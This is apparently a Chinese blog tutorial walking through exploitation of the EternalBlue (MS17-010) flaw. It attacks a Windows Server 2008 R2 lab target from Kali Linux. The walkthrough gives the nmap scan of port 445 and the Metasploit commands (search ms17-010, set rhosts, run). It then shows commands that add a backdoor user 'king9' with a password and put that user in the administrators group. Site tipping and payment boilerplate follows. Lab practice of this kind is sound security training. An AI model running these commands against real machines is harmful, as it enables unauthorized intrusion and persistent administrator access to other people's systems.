永恒之蓝漏洞发现与利用

永恒之蓝恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

攻击机:kali linux
靶机:Windows sever2008 r2
kali和靶机要在同一个网段
我们打开kali

nmap -Pn(目标ip) 扫描目标端口开启情况,主要目标445
在这里插入图片描述
msfconsole 打开攻击软件
在这里插入图片描述
search ms17-010 查看漏洞利用模块
在这里插入图片描述
use 0(一共四个模块,第一个是扫描模块) 打开扫描模块

show options 打开目标设置界面,设置RHOSTS目标IP地址
在这里插入图片描述
set rhosts (目标ip) 设置目标IP地址 也是windows server2008 r2的ip
在这里插入图片描述
run 运行漏洞
在这里插入图片描述
net user king9 2000666zli. /add [在目标主机上创建一个名为king9的账户,密码 2000666zli.
在这里插入图片描述
目标主机被创建账户

因为是创建的用户 所有没有管理员权限,我们给他进行提权
kali下对win7提权

net localgroup administrators 账户名/add

然后我们登陆windows server2008r2
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值